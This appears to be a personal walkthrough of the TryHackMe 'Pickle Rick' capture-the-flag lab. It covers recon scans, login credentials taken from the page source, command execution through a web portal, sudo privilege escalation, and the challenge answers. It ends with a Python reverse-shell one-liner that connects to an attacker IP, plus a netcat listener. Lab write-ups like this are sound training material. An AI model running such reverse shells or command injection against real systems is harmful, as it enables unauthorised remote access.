                             picklerick
                           ======================
Learn about active recon, web app attacks and privilege escalation.
This Rick and Morty-themed challenge requires you to exploit a web server and find 
three ingredients to help Rick make his potion and transform himself back into a human from
 a pickle.

Deploy the virtual machine on this task and explore the web application: MACHINE_IP
 
https://tryhackme.com/hacktivities/search
 
https://tryhackme.com/room/picklerick
 
 
https://medium.com/@matheidemann/pickle-rick-ctf-writeup-full-and-detailed-tryhackme-fcd88a5400e3
    
	walkthrough video (John Hammond)
                       ==============
https://www.youtube.com/watch?v=oCAtfcr3iUw&list=PL1H1sBF1VAKUOm3WyiZ-m2Oqwku4Xp6if&index=5

   
export IP=10.10.22.86
ping $IP
 
   


---------------    nmap      -------------------
nmap -sC -sV -oN  map.txt $IP

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 0d:44:f0:bb:cb:a3:08:87:52:9d:2a:29:02:23:9e:6a (RSA)
|   256 38:c7:50:08:62:87:e5:b2:32:32:0a:99:53:dd:74:bb (ECDSA)
|_  256 54:84:ff:a9:51:3d:b5:5d:50:66:41:1e:b9:ea:84:44 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Rick is sup4r cool
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
--------------     nikto     ---------------------------

nikto -h http://$IP 

+ Server: Apache/2.4.41 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /: Server may leak inodes via ETags, header found with file /, inode: 426, 
   size: 5818ccf125686, mtime: gzip. 
   See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.41 appears to be outdated (current is at least Apache/2.4.54). 
    Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: HEAD, GET, POST, OPTIONS .
+ /login.php: Cookie PHPSESSID created without the httponly flag.
     See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /login.php: Admin login page/section found.
+ 8074 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2025-11-10 12:40:04 (GMT2) (755 seconds)

------------ gobuster    --------------
gobuster dir -u http://$IP  -w  /usr/share/wordlists/dirbuster/directory-list-1.0.txt
	 -x php,sh,txt,cgi,html,js,css,py


.php                 (Status: 403) [Size: 278]
/.html                (Status: 403) [Size: 278]
/index.html           (Status: 200) [Size: 1062]
/assets               (Status: 301) [Size: 315] [--> http://10.10.220.214/assets/]
/portal.php           (Status: 302) [Size: 0] [--> /login.php]
/clue.txt             (Status: 200) [Size: 54]
/robots.txt           (Status: 200) [Size: 17]
/login.php            (Status: 200) [Size: 882]	
-----------------	 



-----------------   dir -----------------
 web page    http://$IP 

 in the source code http://$IP  there is a comant:
     'Note to self, remember username! Username:    R1ckRul3s

 in   http://$IP/robots.txt
  there is a line:                             Wubbalubbadubdub
 http://$IP/assets/	
    list of files
 http://$IP/login.php
    login page 
 http://$IP/clue.txt  	
          'Look around the file system for the other ingredient.'	
	
---------	

move to  http://$IP/login.php       
          user = R1ckRul3s passward = Wubbalubbadubdub

in the command line window run ' grep -r . '
 The result is: 
   	recursively scan for everything so all conntend of the directory is displayed
1. What is the first ingredient that Rick needs?
  in command window run :ls
  open file   Sup3rS3cretPickl3Ingred.txt 
            in url: http://10.10.238.112/Sup3rS3cretPickl3Ingred.txt 
			
   you can use nl 	Sup3rS3cretPickl3Ingred.txt	 
          or strings Sup3rS3cretPickl3Ingred.txt
    to get same results.   
 the connted is :         'mr. meeseek hair'

2. What is the second ingredient in Rick’s potion?
  in clue.txt you will  find:
          'Look around the file system for the other ingredient.'	
     
   So   Lets look at the home folder
   in command line run ls /home
   result: rick
   run: ls /home/rick
   result : second ingredients
   run:   nl   '/home/rick/second ingredients'
   
   open  http://$IP/login.php
    




    What is the last and final ingredient?

Another interesting folder to look at when we were enumerationg the system is the root folder. We don't have permissions to view the folder, so we must elevate our privileges somehow.

Using sudo -l we can check what commands we are allowed to execute with sudo privileges.

Looks like we can execute everything with sudo. So lets look in the root folder using: sudo ls /root.

This works! And we can find a 3rd ingredient file in this folder.
 
run  sudo   nl  /root/3rd.txt
 3rd ingredients: fleeb juice
-----------------------------------------------------------


------------------   Another war using python. ( reverse shall) -------------------

try to run in the command line the commaand 
 python3 -c "print('Hello')"
 if the result is "hello"   then you can run python in the system.
 
 
 reverse shall
 ==================
 gotothe webpage of  'pentestmonkey':
       https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet 
 in python section you will find this script for reverse shall
python3 -c 'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.21.35.25",9999));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1); 
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);'

 
Change the IP   to your TryHackMe VPN  ifconfig tun0 interface IP address. (10.21.35.25)

or run     'ip addr show tun0'
copy it to the command line
 use Netcat on our machine and listen on the  port 9999
 in terminal run:  nc   -lvnp  9999
 and execute the script in the command line

Now you can run commands in the remote host

 next you sould upload your reverse shal  to the remote host 